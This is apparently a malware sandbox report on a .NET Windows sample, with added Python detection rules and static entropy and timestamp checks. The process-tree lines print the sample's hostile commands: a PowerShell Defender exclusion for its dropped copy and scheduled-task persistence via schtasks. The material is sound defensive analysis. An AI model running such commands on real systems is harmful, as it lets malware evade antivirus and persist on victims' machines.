Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpC65B.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Process created: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe"
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpC65B.tmp"
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess created: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe"Jump to behavior
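The process tree above is the whole persistence story in three commands: the sample drops a copy of itself as %APPDATA%\bmkNCLNkqvOpVZ.exe, has PowerShell exclude that path from Defender with Add-MpPreference, registers the scheduled task "Updates\bmkNCLNkqvOpVZ" from an XML definition written to %TEMP% (the tmpB7C4.tmp / tmpC65B.tmp files), and then launches a second copy of its own image, after which the dropped copy repeats the schtasks step. The rules below, an added example and not part of the Joe Sandbox report, flag each of those three behaviours in process-creation telemetry. The event records are constructed from the command lines listed above using Sysmon Event ID 1 field names (Image, ParentImage, CommandLine), which is an assumption about the log source; the parent of the first event is assumed to be explorer.exe because the report only lists it as "unknown". The PowerShell rule also decodes an -EncodedCommand payload so the base64-wrapped form of the same cmdlet does not slip past it.

```python
"""Process-creation triage rules for the chain shown in the report.

Added example, not code from the Joe Sandbox report. Event field names
follow Sysmon Event ID 1 (assumed); the sample events are constructed
from the command lines the report lists.
"""
import base64
import re

# Constructed events mirroring the report's process tree. ParentImage of the
# first event is assumed (the report lists that parent as "unknown").
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe"'},
    {"Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                    r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe"'},
    {"Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "ParentImage": r"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe",
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" '
                    r'/XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp"'},
    {"Image": r"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe",
     "ParentImage": r"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe",
     "CommandLine": r'"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe"'},
]

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
_ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Add-MpPreference with any -Exclusion{Path,Process,Extension,IpAddress} parameter
_MP_EXCLUSION = re.compile(r"add-mppreference.*?-exclusion", re.I | re.S)
# schtasks /Create ... /XML <path containing a \Temp\ component>
_TEMP_TASK_XML = re.compile(r'/create\b.*\s/xml\s+"?[^"]*\\temp\\', re.I)


def encode_powershell_command(script: str) -> str:
    """Build the -EncodedCommand form PowerShell accepts: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def expand_encoded_command(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload, if any, so the rules see the
    same text whether the cmdlet was passed in the clear or base64-wrapped."""
    m = _ENCODED.search(cmdline)
    if not m:
        return cmdline
    try:
        payload = base64.b64decode(m.group(1)).decode("utf-16-le", "replace")
    except ValueError:  # binascii.Error is a ValueError: not really base64
        return cmdline
    return cmdline + " " + payload


def _image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


RULES = {
    # T1562.001 Impair Defenses: Defender exclusion added from PowerShell
    "defender_exclusion_added": lambda e: (
        _image_name(e["Image"]) in ("powershell.exe", "pwsh.exe")
        and _MP_EXCLUSION.search(expand_encoded_command(e["CommandLine"])) is not None),
    # T1053.005 Scheduled Task: definition imported from a file under a Temp directory
    "schtasks_xml_from_temp": lambda e: (
        _image_name(e["Image"]) == "schtasks.exe"
        and _TEMP_TASK_XML.search(e["CommandLine"]) is not None),
    # parent and child share one image: typical of a loader that hollows a copy of itself
    "process_spawns_own_image": lambda e: (
        e["Image"] != "" and e["Image"].lower() == e["ParentImage"].lower()),
}


def detect(events):
    """Return (rule_name, image) for every rule each event trips, in event order."""
    hits = []
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                hits.append((name, e["Image"]))
    return hits


if __name__ == "__main__":
    for rule, image in detect(SAMPLE_EVENTS):
        print(f"{rule:26s} {image}")
```

Two caveats when turning this into a production rule. The Defender check keys on the cmdlet name, but Add-MpPreference is only a front end for the MSFT_MpPreference WMI class: the WmiPrvSE.exe child of powershell.exe in the tree above, and the mpclient.dll it loads further down, are that WMI path, and an actor who talks to the class directly never shows the cmdlet on a command line, so pair this rule with Defender's own Event ID 5007 (configuration change). The schtasks check looks for the XML under any \Temp\ directory, which also covers C:\Windows\Temp; the task name "Updates\..." is worth a separate watch on the Task Scheduler operational log, since the XML file is gone by the time anyone looks.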
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Sections loaded (in order): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, textshaping.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, ntmarta.dll, sspicli.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Sections loaded (in order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Sections loaded (in order): kernel.appcore.dll, taskschd.dll, sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe (second run) | Sections loaded (in order): winmm.dll, urlmon.dll, wininet.dll, iertutil.dll, srvcli.dll, netutils.dll, sspicli.dll, mswsock.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, iphlpapi.dll, winnsi.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Sections loaded (in order): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, textshaping.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Sections loaded (in order): fastprox.dll, ncobjapi.dll, wbemcomn.dll, wbemcomn.dll, kernel.appcore.dll, mpclient.dll, userenv.dll, version.dll, msasn1.dll, wmitomi.dll, mi.dll, miutils.dll, miutils.dll, gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe (second run) | Sections loaded (in order): kernel.appcore.dll, taskschd.dll, sspicli.dll
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe (second run) | Sections loaded (in order): winmm.dll, urlmon.dll, wininet.dll, iertutil.dll, srvcli.dll, netutils.dll, kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: snwo.pdbSHA256 source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, bmkNCLNkqvOpVZ.exe.0.dr
          Source: Binary string: snwo.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, bmkNCLNkqvOpVZ.exe.0.dr

          Data Obfuscation

Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, Form1.cs | .Net Code: InitializeComponent
Source: bmkNCLNkqvOpVZ.exe.0.dr, Form1.cs | .Net Code: InitializeComponent
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.2e7032c.0.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.2d8c9c4.2.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, gM7HF6pf6lrBLxHo57.cs | .Net Code: DtLd1L2S4o System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.2d9e9f8.3.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, gM7HF6pf6lrBLxHo57.cs | .Net Code: DtLd1L2S4o System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.6ec0000.7.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.2dfef04.1.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 9.2.bmkNCLNkqvOpVZ.exe.310c930.2.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 9.2.bmkNCLNkqvOpVZ.exe.311e964.1.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Static PE information: header TimeDateStamp 0xB5CBC42A [Thu Aug 26 06:35:22 2066 UTC], a build date in the future
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function 14_2_0041A8DA: LoadLibraryA, LoadLibraryA, GetProcAddress, GetProcAddress, GetModuleHandleA, GetModuleHandleA, GetProcAddress, LoadLibraryA, GetProcAddress, GetModuleHandleA, GetProcAddress, GetModuleHandleA, GetProcAddress, GetModuleHandleA, GetProcAddress, LoadLibraryA, GetProcAddress, LoadLibraryA, GetProcAddress, GetModuleHandleA, GetProcAddress, GetModuleHandleA, GetProcAddress, LoadLibraryA, GetProcAddress, GetModuleHandleA, GetProcAddress, GetModuleHandleA, GetProcAddress, GetModuleHandleA, GetProcAddress, GetModuleHandleA, GetProcAddress, GetModuleHandleA, GetProcAddress, LoadLibraryA, GetProcAddress, LoadLibraryA, GetProcAddress
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Code function 0_2_0523E412: push eax; mov dword ptr [esp], ecx (at 0_2_0523E424)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Code function 0_2_0523E080: push dword ptr [eax+ecx*2-75h]; iretd (at 0_2_0523E0C5)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Code function 0_2_0523EF22: push eax; ret (at 0_2_0523EF33)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Code function 0_2_07396110: pushfd; iretd (at 0_2_07396115)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Code function 0_2_073958A0: pushfd; retf (at 0_2_073958A1)
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function 9_2_070F4743: pushfd; ret (at 9_2_070F4749)
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function 14_2_004000D8: push es; iretd (at 14_2_004000D9)
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function 14_2_0040008C: push es; iretd (at 14_2_0040008D)
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function 14_2_004542E6: push ecx; ret (at 14_2_004542F9)
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function 14_2_0045B4FD: push esi; ret (at 14_2_0045B506)
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function 14_2_00432BD6: push ecx; ret (at 14_2_00432BE9)
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function 14_2_00454C08: push eax; ret (at 14_2_00454C26)
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Static PE information: section name: .text entropy: 7.831449073906565
Source: bmkNCLNkqvOpVZ.exe.0.dr | Static PE information: section name: .text entropy: 7.831449073906565
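Three of the static indicators in this section are simple measurements that are worth being able to reproduce outside the sandbox: the PE header timestamp that decodes to 2066, the .text section entropy of 7.83 bits per byte, and the entropy of the concatenated .NET method names that the "High entropy of concatenated method names" entries below report. The following is an added example, not code from the Joe Sandbox report, that implements those three checks. The timestamp value and the obfuscated method names are copied from the report; the comparison list of ordinary WinForms method names and the stand-in bytes for a packed .text section are constructed, because the report gives only the entropy figure, not the section contents.

```python
"""Static checks behind the Data Obfuscation indicators in the report.

Added example, not code from the Joe Sandbox report. Reproduces three of
its measurements: PE header timestamp decoding, Shannon entropy of a
section's bytes, and entropy of the concatenated .NET method names.
"""
import math
from collections import Counter
from datetime import datetime, timezone

# Values taken from the report.
REPORTED_TIMESTAMP = 0xB5CBC42A
OBFUSCATED_NAMES = ['nqrnUxOuKL', 'Q17nbFQZmK', 'dPX8tQ0HDV', 'r4d89rDqTI', 'uDR8hl9Il0',
                    'L9g8YEZQvH', 'DiW8ISgaN3', 'F9A8iPG6Cw', 'Yhm8TZpnr7', 'XiD8LxS7g6']
# Constructed comparison set: ordinary WinForms / TypeConverter method names.
CLEAN_NAMES = ['InitializeComponent', 'Dispose', 'ToString', 'GetHashCode', 'Equals',
               'ProcessDialogKey', 'CanConvertFrom', 'ConvertTo', 'EditValue', 'GetEditStyle']


def decode_pe_timestamp(ts: int) -> datetime:
    """IMAGE_FILE_HEADER.TimeDateStamp is seconds since 1970-01-01 UTC."""
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def timestamp_is_suspicious(ts: int, now=None) -> bool:
    """A link time later than 'now', or implausibly old, cannot be a real build date."""
    now = now or datetime.now(timezone.utc)
    built = decode_pe_timestamp(ts)
    return built > now or built.year < 1995


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniform one."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def section_looks_packed(data: bytes, threshold: float = 7.0) -> bool:
    """Compiled code sits well below 7 bits/byte; compressed or encrypted
    payloads (the report's .text at 7.83) sit above it."""
    return shannon_entropy(data) >= threshold


def method_name_entropy(names) -> float:
    """Entropy of the identifiers joined together, the report's obfuscation heuristic:
    generated names draw evenly from [A-Za-z0-9], English ones do not."""
    return shannon_entropy("".join(names).encode("ascii", "replace"))


def triage(timestamp: int, text_section: bytes, names) -> dict:
    """Collect the three verdicts for one binary."""
    return {
        "build_time": decode_pe_timestamp(timestamp).isoformat(),
        "timestamp_suspicious": timestamp_is_suspicious(timestamp),
        "text_entropy": round(shannon_entropy(text_section), 3),
        "packed": section_looks_packed(text_section),
        "name_entropy": round(method_name_entropy(names), 3),
        "clean_name_entropy": round(method_name_entropy(CLEAN_NAMES), 3),
    }


if __name__ == "__main__":
    # Constructed stand-in for a packed .text section: the full byte alphabet, repeated.
    fake_text = bytes(range(256)) * 16
    for key, value in triage(REPORTED_TIMESTAMP, fake_text, OBFUSCATED_NAMES).items():
        print(f"{key:22s} {value}")
```

One caveat on the timestamp check: C# compilers building with the deterministic option write a content hash into TimeDateStamp rather than a clock value, so a .NET binary with a nonsensical build date is not by itself evidence of tampering. It is the combination with the 7.83-bit .text section and the Assembly.Load(byte[]) calls listed above that makes the picture here unambiguous.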
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, cSV1GKxEAhjmpZLsTQ.cs | High entropy of concatenated method names: 'nqrnUxOuKL', 'Q17nbFQZmK', 'dPX8tQ0HDV', 'r4d89rDqTI', 'uDR8hl9Il0', 'L9g8YEZQvH', 'DiW8ISgaN3', 'F9A8iPG6Cw', 'Yhm8TZpnr7', 'XiD8LxS7g6'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, DMkA9oaR6DgC7I9lJ9.cs | High entropy of concatenated method names: 'QhGWkstgXc', 'PWDW0nJRFj', 'PmuWeTS5kr', 'Ty4WFAx6oC', 'qXpW4yZR7i', 'GpYW5OSv6n', 'wDeif9fwC44nr9rdcP', 'vcc40eFBBuk1YBLfLZ', 'WDhWWntX24', 'yF0W6k8Z79'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, bfNUKDLC05VYSm2F1I.cs | High entropy of concatenated method names: 'IRG73t3YB8', 'BJM7f8oYpv', 'lUl7tEvlMA', 'pqX79lsSgL', 'l1G7qNx52W', 'XJ77hgR2wm', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, bBuRmgX3jyALrIBCiGg.cs | High entropy of concatenated method names: 'qRWmNrOmJC', 'HELmRywESZ', 'ge1m1sG6VL', 'GA9mVbRPxd', 'rlumUcH88y', 'VssmgdJ0gB', 'EFfmbqK4WD', 'CwWmcHTibc', 'E46mXbXxod', 'zvOmScSDWJ'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, iIqs66MIvsUPMvbDnA.cs | High entropy of concatenated method names: 'Bdr1fkiok', 'l3eV4pa21', 'BdEgukXNi', 'FwZbVdvRF', 'Qq7XWduyU', 'tmMSe0B7R', 'H1SiBTXpY4craaEa9t', 'jfrp41qv7OsyjgD2G7', 'vXt7PU4Vr', 'TKpJLgkuA'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, VOtjQPVEeDTvgrqiGw.cs | High entropy of concatenated method names: 'uin7EmsHcp', 'B1f7PX7YJb', 'weK78CS9qc', 'PgW7n0gqwt', 'DlW7A2YFMc', 'LHN7kiysPh', 'vRr70skDVd', 'LPn7rHGZvD', 'XbL7ePXQHo', 'DOm7FOWwfb'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, F1oTOmXkHGy1hMPSZsu.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OfqJqWSvaO', 'i3iJw3jr9n', 'smtJBmyKSx', 'vc8JvhdyuG', 'HskJlcNnXT', 'P2ZJMlIxmA', 'acDJHXdp1u'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, vkpNRGnA86RNO8h5Hh.cs | High entropy of concatenated method names: 'TSkAsWVRgS', 'CR2APUjviu', 'alyAnPvo9J', 'Jp8AkPQgWq', 'MjcA0RLUDr', 'dvtnl3dujx', 'WEpnMImwbP', 'VAAnHr2loj', 'EYkn2Do45V', 'MCEnjnAdSL'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, gM7HF6pf6lrBLxHo57.cs | High entropy of concatenated method names: 'VHr6s0Ryq5', 'N8Y6ERuNUK', 'Hpv6PrVUtB', 'EEb68Q0ZmN', 'r3n6n2DTv7', 'U3t6AbJtKv', 'KZp6k70XT9', 'Wn060b2WQp', 'G1H6rFPsNq', 'UGD6eiRB0W'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, ctZSyfZLhhlxY9sntK.cs | High entropy of concatenated method names: 'AQj8VFQbhZ', 'cvq8gt2pUq', 'TAC8clGl0G', 'idE8X4FHJF', 'hom84JQAX5', 'NZx85ZsNGV', 'JFL8G1Sc6a', 'DCW87GL8e7', 'VXg8mHgxMQ', 'RJD8JnnDgu'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, qEr0wKBfcaKhGsHbJ2.cs | High entropy of concatenated method names: 'ufFucJ4yS3', 'gjFuXZbPTr', 'mx1u3SJW5s', 'wd4ufUdvvI', 'YIfu9tAnUL', 'sxAuhjfflm', 'K5xuI8s6iZ', 'sN9uiA9xJp', 'zY3uLsEb6K', 'VZAuDaLOSV'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, IZ0PG98klAYTO2NgNR.cs | High entropy of concatenated method names: 'M1n4LfOu6H', 'kXo4OksJlU', 'CN64qOfNF5', 'KxK4wFZZSP', 'r4M4fSYXph', 'Q124tf3BUR', 'Gjm49SYDHR', 'vE84hl2w8a', 'lud4YcFKMS', 'NMP4IhWMJb'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, Gy5jhpHyHbOrqjj4n9.cs | High entropy of concatenated method names: 'OfamWCtXfE', 'PNCm6MNFlw', 'jW2md1besu', 'BtLmE9sRUI', 'H11mP8PEZ2', 'ae8mnuF6Z9', 'nyGmAovdHb', 'bdm7HiuTn3', 'Fac72MUEBV', 'xJ07jayc5J'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, PpYJNMfTau1IasRZRx.cs | High entropy of concatenated method names: 'Jc4Pq9L41C', 'kZZPwKo2hH', 'KhnPBPZARX', 'DFgPvuW9fw', 'kVKPlMdJe8', 'vSPPMwySn0', 'T4HPH7fItN', 'Vl0P2J8XIT', 'dk7Pj8GdZv', 'P0LPx9LT33'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, DpaETKN4IkAWyGJvgW.cs | High entropy of concatenated method names: 'hFLkNuyGQt', 'ulwkR362YY', 'Xy9k1vmviG', 'yqekVuRZZt', 'evIkULOT8q', 'dygkgPwA7r', 'dAykbpvojh', 'Nd4kc4DnTu', 'i7NkXBp9Y5', 's2xkSGsObZ'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, qvVJ051RsW5USawOuS.cs | High entropy of concatenated method names: 'RDuG2WjES1', 'R7eGxoe1y6', 'bvV7QEvdo9', 'itm7Wa5cFs', 'gp2GDV0lF4', 'sQBGOOE9Ct', 'APGGpv3H98', 'XAPGqNQ3rH', 'rNVGwIPwkg', 'Uv8GBhymRc'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, QW0XatPbBAbeUdR2lN.cs | High entropy of concatenated method names: 'ToString', 'nhG5Dv4MwH', 'YK85fXhCwD', 'Ecj5t0vPVC', 'YNC59Jrlpq', 'eJj5hy5EEN', 'jdY5YA8XWd', 'KM55IuUkJr', 'Y2x5iK1O5C', 'zuY5TdPobE'
